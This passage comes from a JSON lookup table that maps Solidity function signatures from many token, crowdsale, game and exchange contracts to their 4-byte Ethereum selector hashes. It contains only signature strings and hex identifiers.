"timereumDelta()": "0xd1f92cab", "ThriveToken()": "0x35259f1a", "ForecastChainToken()": "0xd7ae339b", "RCR()": "0x3d5b0124", "RamenCoin()": "0xd31f0f38", "transferTileFromOwner(uint16,address)": "0x230894f8", "depositBattleValue(address)": "0xe3e5075c", "withdrawValue(bool)": "0x242a60b5", "createNewUser(bytes32,bytes,address)": "0xe1aa7e95", "withdrawBattleValue(uint256)": "0xf53773dc", "moveBlockValue(uint8,uint8,uint8,uint8,uint256)": "0x8beb9f12", "attackTileForExistingUser(uint16,uint256,bool,bool)": "0xea70bdad", "attackTileForNewUser(uint16,bytes32,bytes,bytes32,bytes32,address)": "0x292a9873", "fortifyClaims(uint16[],uint256,bool)": "0xe4309307", "updateUser(bytes32,bytes,bytes32,bytes32)": "0x7a0e2d1a", "claimTilesForExistingUser(uint16[],uint256,bool)": "0x021ea45e", "claimTilesForNewUser(bytes32,bytes,bytes32,bytes32,uint16[],address)": "0xb607ea45", "attackTile(address,uint16,uint256,bool,bool)": "0x8b50cd34", "BarryUtilityCoin()": "0x93aa3014", "MYRN()": "0xc2b8fd12", "withdrawAllFundsFromContract()": "0xf17d186c", "migrateAll()": "0x4a77f870", "_not(bool)": "0xc83cb16c", "_hardRequire(bool,bytes32)": "0xebc56c33", "globalether()": "0x20917902", "HolikopterToken()": "0xd7121f4b", "payout(address,address,uint256)": "0x20f801d4", "buyUsingRefBonus(address,address)": "0x010d3bf6", "getNewOwner()": "0x3e2fe149", "getRef(address)": "0x5a7db533", "getRefBonus()": "0x87943859", "hasRefBonus()": "0x37adf3a3", "setRefBonus(uint256,uint256)": "0xf0296bfa", "open(address,address,uint256)": "0xf4f27042", "_ensureRef(address)": "0x42285bc5", "DuxToken()": "0xcf3743c6", "MONACOESTAT()": "0xa57d814b", "LOL2()": "0x24a1871e", "SCMOXToken()": "0xaf60dc4f", "BitcoinBlackToken()": "0xd3670cb4", "CryptoSureToken()": "0x9990db92", "watchMovie()": "0xa363f269", "Movie(string,string,uint256)": "0x85011eec", "checkBalances(address[])": "0x2db26de1", "finishVote()": "0x2aebcbb6", "makeVote(uint256)": "0x3eaf7591", "set_result_of_game(uint8)": "0x8a9cba3c", "get_contract_money()": "0xdd847dfe", "start_game()": "0x244967b3", "request_payout_users()": "0xef2f2750", "request_payout_holder()": "0x4f32de0a", "update_coeff()": "0x7e951bc6", "get_bet(address,address)": "0xe0204585", "bet_on_team_2()": "0x977f7c7e", "bet_on_team_1()": "0x85dd1fbd", "Football()": "0x3dda1aff", "KhawCoin(uint256,string,string)": "0x3c0b0279", "getBoth()": "0x93affe51", "BitcoinDiamondTest()": "0x6faf4803", "RusaToken()": "0x928693c6", "newTimeLockedWallet(address,uint256)": "0x0a9ef927", "getWallets(address)": "0x422c29a4", "BreakCoinToken()": "0x3d58650a", "Flip1Token()": "0xd1701397", "SimpleATM()": "0x7d136133", "withdraw(uint16)": "0x3d972839", "withdrawAny()": "0xe2121de1", "deposit(uint16)": "0xc9c0c77a", "getAllAssets()": "0x2acada4d", "LIANGToken()": "0x95005a00", "OkapiToken()": "0xa0a5cd92", "TTARD()": "0x4e7dbb29", "DigitalCash()": "0x3c704089", "savePost(bytes32)": "0x1926b63d", "RobotTradingIco(address)": "0x5284e3d8", "TootyrTokenSale()": "0xacbaed04", "EtherTradex()": "0x9520cc72", "validPurchase(uint256,uint256,bytes)": "0x92da29d2", "updateCapAndExchangeRate()": "0x38f41711", "currentTranche()": "0xc404b3f6", "setCapUsd(uint256)": "0x6e0dd984", "buyTokens(uint256,uint256,bytes)": "0x3d00b8e3", "mintPreSale(address,uint256)": "0x8c25466a", "NectarCrowdsale(uint256,uint256,uint256,address,address)": "0x4406fbab", "dice(uint256,uint16)": "0x1608e93f", "random(uint256,uint16)": "0xa983e1bb", "testGetRandomDragon(uint256)": "0xf7146269", "getBalloonCosts()": "0xe55b4aa8", "getCosts()": "0x03075018", "DragonKingTest(address,address,address,address)": "0xb13c7047", "CurrentMined()": "0xcc0a26d1", "RewardEnd()": "0xb579d7de", "RewardStart()": "0x5d7e994a", "RewardTimePeriod()": "0x8a5910a5", "NextRewardHalving()": "0x0c3980ef", "RewardHalvingTimePeriod()": "0x662a719b", "MaxMiningReward()": "0x4668f372", "MiningReward()": "0x8a61dcb7", "MaxTotalSupply()": "0xda0f039d", "cash()": "0x961be391", "Pume(uint256,string,string)": "0x9ccdd994", "ShyneTokens(uint256,string,string)": "0xfa4a2e36", "transition()": "0xd7efbf34", "sendRefund(address)": "0xcae4d676", "whitelistMany(address[])": "0xa77f7c8c", "setEtherWallet(address)": "0xee1f5a7f", "fillSellOrder(address,address,uint256,uint256)": "0x257ef70b", "library2function()": "0x9095df68", "library15function()": "0x62c375a7", "library14function()": "0xf9f14f6a", "library1function()": "0xd5b74699", "contract8function2()": "0x38556c3a", "contract12function2()": "0xba629113", "contract6function2()": "0x12fca967", "contract6function1()": "0xcd71a397", "HWGLToken()": "0xd238ec90", "EBITOKEN()": "0xa7560bec", "iWantToKillMyself()": "0x578c3485", "increaseNumber(uint256)": "0x1119e8a6", "funcThatReverts()": "0xc8f07770", "funcWithoutArguments()": "0xca5271a1", "withdrawJackpot()": "0xc0b3870a", "Attacker(address)": "0x2e01d229", "TSTEST()": "0x49d834cd", "CCH_LLV_303()": "0x4457ce5b", "RepToken(address,uint256,address)": "0x3ac163a7", "Exchange(address)": "0x459659a4", "holderCount()": "0x1aab9a9f", "Token(string,string,uint8)": "0x280b8846", "XXXcoin()": "0xf00423ac", "EasyOsmiumCrowdsale()": "0xc0204bab", "Osmium()": "0xb0d8a83c", "OsmiumCrowdsale()": "0x025a6f02", "airdropSameAmount(address[],uint256)": "0xea8ef515", "SECUREOURSCHOOLS(uint256,string,uint8,string)": "0xef057245", "getKingdomInformations(string)": "0xd2bf779f", "getKingdomCount()": "0x8e406072", "getJackpot(uint256)": "0x4ce4f927", "setNewWinner(address,uint256)": "0x50fdb01a", "activateNextRound(uint256)": "0xfa4125f7", "payJackpot(uint256)": "0xd093e04b", "forceWithdrawPayments(address)": "0x5d760b45", "compensateLatestMonarch(uint256,uint256)": "0xaab78bf5", "createKingdom(address,string,string,uint256,bool)": "0x56247e6d", "giveKingdom(address,string,string,uint256)": "0x84c615e2", "setLock(string,bool)": "0x76520713", "setNewJackpot(uint256,uint256,address)": "0xc5aa0f17", "purchaseKingdom(string,string,bool)": "0x0203596d", "setTypedJackpotWinner(address,uint256)": "0xdb775410", "getRemainingKingdoms()": "0xd9d84531", "Map(address)": "0xc483b71c", "JuventusvsRealMadrid()": "0x38bb3977", "OrdoCoin()": "0xe451197a", "forward_funds(uint256)": "0xd9515238", "airdrop_auto(address,address)": "0xc2cbb299", "batch_send(address[],uint256)": "0xde1c78fb", "NEXMESH()": "0x7b698602", "acceptTokens(address,uint256)": "0x3cb8cfc8", "getCommandTokens()": "0xf452b69c", "closeCrowdsale(address)": "0x0b522abf", "externalPurchase(address,string,string,uint256,uint256,uint256)": "0x1ba6e1bd", "StandardToken(string,string,uint8)": "0x43ed2863", "getManagers()": "0xa8d088bb", "countManagers()": "0x0f5bab7c", "NamiMultiSigWallet(address[],uint256)": "0xa5496781", "buyNac(address,uint256)": "0xa236e665", "closeAskOrder()": "0x4ba9fb71", "closeBidOrder()": "0x4313de82", "sellNac(uint256,address,uint256)": "0xbd1a77a8", "placeBuyOrder(uint256)": "0x19f577b3", "NamiExchange(address)": "0x0aed5a21", "tokenFallbackExchange(address,uint256,uint256)": "0xcd8d8da0", "tokenFallbackBuyer(address,uint256,address)": "0x09c71690", "closeSession(uint256)": "0xa3bfdf47", "getEtherToBuy(uint256,bool)": "0x6052a849", "closeInvest(uint256)": "0x2c710cc8", "invest(bool)": "0x4cbabcdc", "openSession()": "0xf8635ece", "resetSession()": "0xf8a3ce82", "getChooses()": "0x81e77878", "getInvestors()": "0xb2f5a54c", "changeRateFee(uint256)": "0x073767fc", "changeRateLoss(uint256)": "0xcb739c0f", "changeRateWin(uint256)": "0xeeebb30c", "changeTimeOneSession(uint256)": "0x6e06a9ce", "changeTimeInvest(uint256)": "0x95449ad5", "changeMinEth(uint256)": "0x5ca1cacc", "BinaryOption(address,address,address)": "0x991fa5af", "transferToBuyer(address,uint256,address)": "0x78044ba5", "transferToExchange(address,uint256,uint256)": "0x8d70c0ce", "migrateForInvestor()": "0xe0c6d1ed", "migrateToken(address,address)": "0xce6d35d1", "_migrateToken(address,address)": "0x70f65977", "safeWithdraw(address,uint256)": "0x5058c460", "changeBinaryAddress(address)": "0xf5d97789", "changeBinary(uint256)": "0xd579f9e8", "changeEscrow(address)": "0xdcfcda2b", "changeTransferable()": "0xa99d8d48", "transferForTeam(address,uint256)": "0xabc4cbd3", "NamiCrowdSale(address,address,address)": "0x377dda1a", "GetBestWalletAddress(uint8)": "0x68b1a6d0", "GetBestTokenCount(uint8)": "0xc131acdf", "LeviusDAO()": "0x4a4c1bcd", "CheckBest(uint256,address,address)": "0x22855bf0", "transferWithoutChangeBest(address,uint256)": "0x077757fc", "TokenADSVENTURE()": "0xa38b8469", "changeServiceAgent(address)": "0xcef5ed69", "getUniqueAddressByIndex(uint256,address)": "0xead2a439", "addAddressToUniqueMap(address)": "0x3c5c6331", "removeBlacklistItem(address)": "0x6d77e144", "addBlacklistItem(address)": "0xc4bff124", "LuckchemyToken()": "0xe5d90d94", "getPlayer(uint256)": "0xe55ae4e8", "withdrawJOYTokens()": "0xb26f72a4", "setTournamentAddress(address,address)": "0x0f43c196", "setJOYTokenAddress(address,address)": "0x616ceda7", "BSCore()": "0x8e77afc5", "tournamentResult(uint32[3][11][32])": "0xfd070667", "queryPlayerUnAwakeSkillIds(uint32[11])": "0xe773ffd5", "queryPlayer(uint32)": "0x1262eb73", "queryPlayerType(uint32[11])": "0x8d0d27ba", "checkOwner(address,uint32[11])": "0x12055758", "createCommonPlayer()": "0x895c666a", "_onPromo(address,uint256)": "0x10ddd6fc", "getItemsForSale()": "0x064ddd04", "setLootboxFee(uint256)": "0xdcf219f2", "openLootbox(address)": "0x33dddc3a", "putOn(uint256,uint256)": "0x4506e64d", "takeOffItem(uint256,uint8)": "0xdb9f16a8", "hasChampSomethingOn(uint256,uint8)": "0xe5b598d9", "withdrawToAddress(address,address)": "0x5c2c8db7", "withdrawChamp(uint256)": "0x33fb1e05", "changePlayersName(string)": "0x54c9cc44", "changeChampsName(uint256,string)": "0xbcb98ba2", "setCreateChampFee(uint256)": "0xd0220b1c", "createChamp(address)": "0x780bbe60", "getChampReward(uint256)": "0x94b5c9f3", "getChampsCount()": "0x317ab6dc", "getChampsByOwner(address)": "0xf0c41bb2", "triggerPause()": "0x6833f60d", "closeMint()": "0x64f101f0", "InteractiveCrowdsaleToken(address,string,string,uint8,uint256)": "0xb7ddcb27", "calculateTokenPurchase(uint256,uint256)": "0x4ec9ef9c", "numDigits(uint256)": "0xdb9d28d5", "GoldBoxToken()": "0xfc7596a8", "Expand()": "0x9dfad52d", "toSTAR(uint256)": "0x6428925d", "STARCrowdsale()": "0x690d0b1d", "addAuction(uint32,uint256,uint256,uint8,uint32)": "0x76a310a5", "Cosmo()": "0x9036420a", "applyBonus(uint256,uint256)": "0xfaf81ba5", "mainSaleHasEnded()": "0x951382bf", "setMainSaleParameters(uint256,uint256,uint256)": "0x7cff33c7", "WelCoinICO(uint256,uint256,address,address)": "0xf15467c4", "Oceans8RT()": "0x36f2b803", "Protean()": "0xbd37fec9", "QuantorPreSale(uint256,uint256,address,address,address,uint256,uint256,uint256)": "0x42e2da09", "distribute(uint256,address)": "0xe1fa8b02", "TRUEToken(address)": "0x7e080911", "PolicyPalNetworkToken(uint256,address)": "0x70948956", "toggleTransferable(bool)": "0xd9194d2c", "airdropSingleAmount(address,uint256)": "0xb3a06e75", "batchMultipleAmount(address[],uint256[])": "0xc4479812", "batchSingleAmount(address[],uint256)": "0xfd282afe", "VikoChain(string,string,address)": "0x94756e22", "LoomToken()": "0x98e47e49", "ETH033()": "0x17e49dc9", "RomanLanskoj()": "0xb6994dc0", "BUZZToken()": "0x9d2ab46d", "PRBCoin()": "0x7ddd130f", "withdrawFromRemainingTokens(uint256)": "0xb559b0fe", "isMemberOf(address,address,string)": "0xd180be1d", "setDiscountMember(address,address,string,bool)": "0xd53ca3c7", "setMinMax(uint256,string)": "0x07461622", "setEventActive(bool,string)": "0xc009b451", "setCustomEvent(uint256,uint256,bool,string,uint256)": "0x3fc44ab3", "notPauseable()": "0x9b21003b", "HOWLToken()": "0x579424e7", "CoCoCoin()": "0xfd225cfd", "ONETIDC()": "0x65f0a00b", "DPPToken()": "0x773c3f50", "transferBankOwnership(address)": "0x681e3356", "getStakedTeller(address)": "0x19f1cded", "getStakedShop(address)": "0x4b0ad8fa", "isTeller(address)": "0xfac8a800", "getAllTellers()": "0x4f4cd650", "getZoneTeller(bytes2,bytes16)": "0xfa1d9cf8", "isShop(address)": "0x1d0e8a4d", "getAllShops()": "0xd5c9b239", "getZoneShop(bytes2,bytes16)": "0xb5c4147f", "getTellerBalance(address)": "0x59b17b43", "getReput(address)": "0x2314a5c8", "getShop(address)": "0x0e479dc7", "getTeller(address)": "0xf554567f", "deleteShopMods(address)": "0xb0547d8c", "deleteShop()": "0x43579fe8", "deleteTellerMods(address)": "0xf0024677", "deleteTeller()": "0x8bd1b610", "switchStatus(bool)": "0x3b23a5ca", "sellEth(address,uint256)": "0xdd955c44", "updateTeller(int8,bytes16,int8,int16,bool)": "0x3fa19804", "initContract(address,address)": "0x25ba0f51", "DetherCore()": "0x586b1c8f", "toBytes1(bytes,bytes,uint256)": "0x64cf6d71", "toBytes4(bytes,bytes,uint256)": "0xd043d028", "toBytes2(bytes,bytes,uint256)": "0x24860443", "toBytes16(bytes,bytes,uint256)": "0x248b0dba", "toBytes32(bytes,bytes,uint256)": "0x711f63bf", "closeZoneTeller(bytes2)": "0x9ae120dd", "openZoneTeller(bytes2)": "0x1d32f106", "closeZoneShop(bytes2)": "0xba2a98f2", "openZoneShop(bytes2)": "0x66d5eb9b", "setLicenceTellerPrice(bytes2,uint256)": "0xf2d15c48", "setLicenceShopPrice(bytes2,uint256)": "0x9a8061e8", "setKycCertifier(address)": "0xe019ac29", "setSmsCertifier(address)": "0xfcf3438c", "removeTellerModerator(address)": "0xaa5a11c5", "setTellerModerator(address)": "0xd0a4a81b", "removeShopModerator(address)": "0x529e65e1", "setShopModerator(address)": "0x809ffb20", "setCSO(address)": "0x2105c049", "setCMO(address)": "0x2072863b", "isCSO(address)": "0x0c9f980f", "getEthBalTeller(address)": "0x8d837f38", "totalAllocation()": "0x79203dc4", "companyReserves()": "0x9f0e7d44", "ROLE_CRO()": "0x112cc015", "opetTokenBalance()": "0x83150a93", "saleTokensCents()": "0xdba33c03", "TOKEN_RATE_30_PERCENT_BONUS()": "0x511acd53", "referralRate()": "0xa053ce1f", "nomin()": "0xe59160e3", "level_5_amount()": "0x7385e1f3", "eachPUSTprice()": "0xa4430321", "HGT_Reserve()": "0xd4788cc3", "webGiftOnceMaxAmount()": "0xe2219773", "timeBeforeJackpot()": "0x43c1f0ed", "bbodServiceRegistry()": "0x0187a677", "fundingProcessed()": "0x0db03955", "numberOfTokensToAvail25percentDiscount()": "0x15158a10", "teamTokensIssueDate()": "0x293f2ad7", "vitPerWei()": "0x99f49f0d", "owner_endGetting()": "0x9777aa49", "isRedemptionReady()": "0x9da19acc", "getCountMembers()": "0x66b5e2d8", "OPERATION_STAKE()": "0xa053eb9d", "randomTicket()": "0x3947050f", "sumOfWeights()": "0xd534831c", "FoundationSupply()": "0x319983f8", "ZRX_TOKEN_ADDR()": "0xb2dfa399", "REFERRAL_BONUS_LEVEL4()": "0x32c896d4", "totalCirculating()": "0x45f32b6d", "claimOwnership1()": "0x45fd9e23", "lastHotPotatoHolder()": "0x7be8630f", "tokenHolder()": "0x420a83e7", "rightVotes()": "0xbaa24fce", "getExternalCurrencyProcessor()": "0x119ebe89", "bZxTo0xContract()": "0xb7a025f9", "PUBLIC_SALE_PRICE()": "0x07e89ec0", "Bcigarcoin()": "0xba0d94a8", "jpPercentage()": "0x11daa2d0", "nMsgsWaiting()": "0xcc03477d", "bonusRateInPercent1()": "0x07d78e21", "airFropTracker_()": "0x116a8221", "paused2()": "0x6515c6a9", "getSendableEther()": "0x51431800", "privatePlacementSupply()": "0x7c95ef3f", "FINTRUX_RESERVE_FTX()": "0x78912dee", "maxPreIcoTokens()": "0xb61d4511", "EPOCH_LENGTH()": "0xac4746ab", "appliedPresale()": "0xc1ed41fa", "bettingStart()": "0x65419516", "HOLDING_START()": "0x86d2ee85", "getTicketsCount()": "0x080b2a86", "claimEndTime()": "0x40d1d255", "coreTeamSupply()": "0x6bff1901", "getMarket_CommunitUsedTokens()": "0x2dd0e79e", "priceInTokens()": "0x8750c2d7", "bonusPhase3()": "0xa5b75814", "ico2endTime()": "0x713955e8", "claimOwnership2()": "0xa75343bf", "total_wins_count()": "0x7e1e447e", "stage_2_TokensSold()": "0x9700d0f0", "numTurnsToRevolve()": "0x1a90f0c4", "unfreeze_end_date()": "0xcdbccf50", "partnernames()": "0x48fdb8c1", "nextLotteryTTWTokenId4()": "0x03d08f3b", "WHOLE_ETHER()": "0xa461cadf", "PreSaleHardCap()": "0x88398fbc", "piggyBank()": "0xb7d5d4c0", "presaleEndTime()": "0x249b7c19", "VALUEBACK()": "0x66fb3831", "amountFundAirdrop()": "0x0aef8500", "weekly_disbursement()": "0x9e20afdf", "MAX_PLAYERS_PER_STAGE()": "0xefe6c772", "bZxContractAddress()": "0xe4a72b13", "tokenPriceInCents()": "0xc7a1f221", "ledToken()": "0x2aa6f98b", "ContractTotalMined()": "0xf6b39b3c", "gamesFund()": "0xfd791031", "returnEverything()": "0xeee2cc46", "voting_started()": "0x3297ef5b", "bcdcMultisig()": "0x5b0dad8e", "dolRate()": "0xae043336", "getCrydrViewStandardNameHash()": "0x230f6e83", "startAcceptingFundsBlock()": "0x90c79af9", "currentMarketRate()": "0x7bce89cc", "advisorsWallet()": "0x6b252b47", "betCount()": "0xcf094497", "MAXIMUMINVESTMENTSALLOWED()": "0xf8dad3db", "powerDayPerPersonCapInWei()": "0xc5543b22", "perStageNxc()": "0x630f479e", "bonusNum()": "0xcc90da29", "supplyTokensSaved()": "0x198c548b", "supplyReserveVal()": "0x87f40ba4", "tokensClaimableAfter()": "0xcd230ebd", "next_week_timestamp()": "0x38bd8357", "_arbitrationPercent()": "0x185f23c4", "tokenRate5()": "0xca7b15da", "EGC()": "0x0bb5e62b", "dust()": "0xfad9aba3", "forceCancel()": "0x004f3e86", "dreamToken()": "0x41c1f5b4", "TOKEN_MIN_PRICE_THRESHOLD()": "0x77fcc493", "developers()": "0x2bc31ca4", "disqualifyBid(address,bool)": "0x2baa2c58", "depositSecretBid(bytes32,bytes)": "0x25ede147", "setAuctionParms(uint256,uint256,uint256)": "0x2134927e", "reserveDeveloperTokens(address,uint256)": "0x1f6c76f4", "withdrawRefund()": "0x110f8874", "stateMask()": "0x0cf85c4c", "executeBid(uint256,uint256,uint256)": "0x02f65096", "purchasedCount()": "0x006b1fd1", "message()": "0xe21f37ce", "currentPrice()": "0x9d1b464a", "BASEPRICE()": "0x4e9b5db0", "putMessage(string)": "0x26eda1ac", "removeMessage()": "0x0bc9c89c", "enableTransfer()": "0xf1b50c1d", "disableTransfer()": "0xb187984f", "transferState()": "0x92c00a3f", "disableContract()": "0x894ba833", "contractState()": "0x85209ee0", "generateTokens(address,uint256)": "0x827f32c0", "tokenGenerationState()": "0x66802a92", "enableGeneration()": "0x3f69034f", "_totalSupply()": "0x3eaaf86b", "enableContract()": "0x367edd32", "disableGeneration()": "0x2a9046d8", "setCurrentCoin(address)": "0x0f13af83", "icoPhases(uint256)": "0xf69d5f0e", "preIcoBonus(uint256,uint256)": "0xdc21b3de", "newOwner()": "0xd4ee1d90", "sendEther(address,uint256)": "0xc1756a2c", "addToOwnerlist(address)": "0xa162a71f", "burnUnsoldTokens()": "0x940bb344", "priceUpdateAt()": "0x7ea15da1", "EthToUsd()": "0x79409b19", "getAmountWithBonus(uint256)": "0x3334f1f8", "pow(uint256,uint256)": "0x2e4c697f", "IcoBonus(uint256)": "0x2c71d524", "removeFromOwnerlist(address)": "0x1769af29", "allOwners(uint256)": "0x1516db09", "setCourse(uint256)": "0x0dd6eae1", "getTokenWithBonus(uint256)": "0x01cffa17", "remove(bytes32,bytes32)": "0xb10e4172", "length(address)": "0x2c566ae5", "insert(address,address)": "0xc0a2203e", "insert(int8,int8)": "0x9e8cfe20", "insert(int256,int256)": "0xc1d25c3d", "contains(bytes32,bytes32)": "0x5bf2a4e9", "contains(int8,int8)": "0xb47f833c", "length(bytes32)": "0xa9dbaf25", "remove(bytes1,bytes1)": "0xabd06c3b", "contains(uint256,uint256)": "0x438e15fc", "remove(uint256,uint256)": "0x6526db7a", "contains(bytes1,bytes1)": "0xd0a1adf4", "length(bytes1)": "0xcf6036fd", "insert(bytes1,bytes1)": "0xd02ddc12", "insert(bytes32,bytes32)": "0xfeac36d7", "length(uint8)": "0x34d31de3", "length(int8)": "0xaa590140", "remove(uint8,uint8)": "0xb7d5e804", "length(uint256)": "0xaa8b99d2", "contains(uint8,uint8)": "0x0a07f3d8", "remove(int256,int256)": "0x1c480cb6", "contains(int256,int256)": "0x5f85abdc", "remove(address,address)": "0x7f7c1491", "remove(int8,int8)": "0x985540b9", "contains(address,address)": "0xed26cae8", "length(int256)": "0x2ae72544", "insert(uint8,uint8)": "0xbba8a065", "deleteEntry(bytes32)": "0xef8dd09b", "userEntries(address)": "0x9f10a990", "registeredUsers()": "0x660d5887", "addEntry(bytes32)": "0x5910a18b", "entryInformation(address,bytes32)": "0x492c981b", "refund(address,uint256,uint256)": "0x18fd8903", "withdrawForeignTokens(address)": "0xe58fc54c", "perform_withdraw(address)": "0xfcfdbc23", "picops_withdraw_excess()": "0xf739ba2f", "set_successful_verifier(address)": "0xf3c7e538", "set_sale_address(address,address)": "0xcc94e4a2", "contract_enabled()": "0xea083b86", "max_raised_amount()": "0xdd9e7b1b", "drain_block()": "0xcb43e079", "picops_identity(address,uint256)": "0xc5787fa3", "contract_eth_value()": "0xc42bb1e4", "picops_user()": "0x9250b080", "picops_is_enabled()": "0x8dc07e46", "set_block(uint256)": "0x8a9f8a43", "refund_me()": "0x81702c34", "sale()": "0x6ad1fe02", "bought_tokens()": "0x6360fc3f", "picops_enabled()": "0x52f62195", "pool_drain(address)": "0x2d48bcec", "min_required_amount()": "0x2a2fbd4b", "buy_the_tokens()": "0x28b8e9cf", "enable_deposits(bool)": "0x263c493a", "picops_block()": "0x24361cec", "returnAmount(address,uint256,bytes32)": "0xf96cecc1", "returnAddress(bytes32,uint8,bytes32[2])": "0xf80b3564", "nonActivationWithdrawal(address[2],uint256[8],uint8,bytes32[2])": "0xe7ebc348", "depositCoupon(address[2],uint256[8],uint8,bytes32[2])": "0xcbb9dbb9", "endSaleTime()": "0x58371ccd", "multiOwnerSides()": "0x3e98039a", "royaltyInformationContract()": "0x11c33625", "WLM()": "0x2c3c42b2", "privatePresale()": "0x90dfb092", "totalGas()": "0xe4b1fe54", "rentalsContract()": "0x3c667b13", "referrerReward()": "0x0763f34e", "ICO_PERCENTAGE_2()": "0x69b8f38d", "saleTokensVault()": "0x709cf8c0", "securityPercent()": "0x95ab32a3", "MAX_AIRDROP_TOKENS()": "0xef2cc977", "IAM_PER_ETH_BASE_RATE()": "0x48b24b88", "withdrawFeeRate()": "0xea99e689", "fixedFeeInWei()": "0x7d55f64d", "EGGS_TO_HATCH_1BAT()": "0x769af180", "contributionPool()": "0x4891c06a", "lastBlock_f2Hash_uint256()": "0xdc5aa474", "getMin(uint32[])": "0xfc959d9a", "walletTokenReservation()": "0x4190af2e", "endDayOneTime()": "0xf942be1c", "kUnit()": "0xdd4dfb62", "dividendsPayedIndex()": "0x7a6506f6", "developerWallet()": "0x185870f9", "beginTime()": "0x88149fb9", "bbReserveWallet()": "0x92d42475", "nSteps()": "0xf3b585cc", "operatingOfficerAddress()": "0x6bfa5edc", "cost()": "0x13faede6", "baseStartTime()": "0x0f7503c9", "getWinningNumber()": "0x8b0b9ed4", "REGISTRY_INTERFACE_REQUIREMENT()": "0x10878ea1", "singleWithdraw()": "0xf843b1b6", "TEAM_MONTHLY()": "0xc5015018", "AIRDROPBounce()": "0x334b8771", "rnBlock()": "0x28764b44", "miningTenPlat()": "0x55d79248", "totalSUM()": "0x395b9467", "lastSignedBlockHash()": "0x8b235f04", "rateCoefficient()": "0x7c831bd9", "lastBlock_a7()": "0x1f5dfcd5", "battleContract()": "0x423b1ca3", "angelRate()": "0x95e7b3c5", "vaultUnlocked()": "0x1fb8d5de", "REFERRAL_SHARE_RATE()": "0x9702795d", "listingFeeInWei()": "0x67e94ae0", "powLimit()": "0x6748a106", "timeThatFinishGuaranteedPeriod()": "0xe38bc1f0", "getUpdateTimes()": "0x417a2909", "minimum_investment()": "0xa8f07dcc", "etherCollected()": "0x4b2cbc9d", "ROLE_TRANSFER()": "0x89b1fa0a", "erc721Contract()": "0xd7c97fb4", "FOUNDERS()": "0x153debee", "indexPaidBonus()": "0x76ca9e48", "bts_address2()": "0xa8ed1be5", "beneficiaryMultiSigWithdraw()": "0x07db4228", "publicsalesTokenPriceInWei()": "0x581d1015", "BONUS_TIER_4_LIMIT()": "0xa859eb81", "regStartTime()": "0xa69bd4a8", "AID()": "0x02e635e6", "kittensRemainingForSale()": "0x090f92f7", "tokensForReservedFund()": "0xa4288d17", "SaleToken()": "0x833cde52", "m_isCirculating()": "0xd785e5c9", "t_ImmlaTokenDepository()": "0xf4a475cb", "rateIcoPreICO()": "0x01e1bcf7", "r2()": "0x0bcbbd21", "getFirstPhaseCap()": "0x80cf264d", "referralSent()": "0x1fb8875d", "firstChangeBlock()": "0xb41e79d4", "sellMultiplier()": "0xfed0d2a1", "capPreICOTrasferred()": "0xd19c395f", "buyBottle()": "0x80e64e8b", "minimum_donation()": "0x55fa1348", "remainingAmount()": "0xa50a1fe6", "pregnantHorses()": "0x7ed57fa0", "referralAmount()": "0x6bd68a8f", "ITSEndTime()": "0x3254de48", "stopRefund()": "0x773eef36", "accountsToAllocate()": "0x7915785e", "instContAllocatedTokens()": "0x8789dfbf", "lockedBoardBonusAddress()": "0xbd249ff0", "creditsClawbacked()": "0x9b7143eb", "MINING_OUTPUT()": "0x9d4936f9", "ONEPERCENT_TOKENS_PER_ETH()": "0x27e7fe5a", "Start7()": "0x1d4a48b7", "crowdfunding_allocation()": "0x1f60d9f7", "pointMultiplier()": "0x658b98a9", "xactionFeeShare()": "0xc6117d37", "webpage()": "0xd2d976da", "maxHalvings()": "0xdac00420", "BLMFund()": "0x574844f4", "tokenURISuffix()": "0xdbbc853b", "SISA_token()": "0xdf673d35", "gameDeveloperSupply()": "0x38285534", "firstMonthEnd()": "0xef416aec", "window()": "0x461645bf", "amountOfInvestments()": "0x2be2d95e", "Controller_Address1()": "0x1ed5da2f", "EtherPredict()": "0x4b76fe19", "LEF()": "0x449d2712", "sendTokens(address[])": "0xb373a6cd", "getPayAmount(address,address,uint256)": "0xff1fd974", "buyEnabled()": "0xf582d293", "offer(uint256,address,uint256,address,uint256,bool)": "0xe1a6f014", "_rank(uint256)": "0xc2d526aa", "setMinSell(address,uint256)": "0xbf7c734e", "_near(uint256)": "0xa78d4316", "_menu(bytes32)": "0x96d7a9ed", "_dust(address)": "0x91be90c8", "isTokenPairWhitelisted(address,address)": "0x8d7daf95", "buyAllAmount(address,uint256,address,uint256)": "0x8185402b", "getOfferCount(address,address)": "0x7ca9429a", "_best(address,address)": "0x74c1d7d3", "_span(address,address)": "0x677170e1", "close_time()": "0x6377ebca", "getMinSell(address)": "0x511fa487", "last_offer_id()": "0x232cae0b", "offer(uint256,address,uint256,address,uint256)": "0x1b33d412", "remTokenPairWhitelist(address,address)": "0x1aa859d0", "addTokenPairWhitelist(address,address)": "0x15e28700", "getBuyAmount(address,address,uint256)": "0x144a2752", "make(address,address,uint128,uint128)": "0x093f5198", "sellAllAmount(address,uint256,address,uint256)": "0x0621b4f6", "matchingEnabled()": "0x01492a0b", "unFreeze(bytes32)": "0x392542fb", "freeze(bytes32)": "0xec13cc7b", "setSubscriptionStatus(bool,bytes32)": "0xd1d1f264", "subscribe(address,bytes32)": "0xabfcb627", "withdrawBySubscription(address,uint256,bytes32,string)": "0xc8ee0c6b", "depositWithReference(string)": "0xf89005e7", "subscriptions(address)": "0xf046395a", "statuses(bytes32)": "0x10f7cf32", "RBC()": "0xe6f46410", "DogecoinPrivate()": "0x6b698377", "ElectronicHealthRecordToken(uint256,string,uint8,string)": "0xe5043632", "BetherBank()": "0x79ccd1a1", "IOXToken()": "0x602cf359", "IOXOwned()": "0x31324b0a", "Bitkeun()": "0xdf96a336", "FlexFitRewards()": "0xca087b96", "Transtoken()": "0x36682d5d", "Defraycoin()": "0xe5260958", "LABEEToken(uint256,string,string)": "0x05626694", "UPO(uint256,string,uint8,string)": "0x7b44eb51", "BFToken(string,string,uint8,uint256)": "0x73342168", "multyTransfer(address[],uint256[])": "0xa7b2bfc7", "SafeWalletCoin()": "0x757dfdcc", "getBonus(uint256,address,uint256)": "0x4d99055c", "buyTokens(address,bytes)": "0xb3746849", "cthereum(uint256,string,uint8,string)": "0x88ac76ca", "GHK()": "0xa407db23", "ROB()": "0x69f18b8c", "BusinessUnion(uint256,string,uint8,string)": "0x24a80b31", "SQT()": "0x235029ee", "VetLite(uint256,uint256)": "0x5471d5d8", "joojinta()": "0xce85fbe2", "ReferralWeToken(address,uint256)": "0x283dc942", "withdrawERC20(address,uint256)": "0xa1db9782", "BitcoinProtocol()": "0x7659fd71", 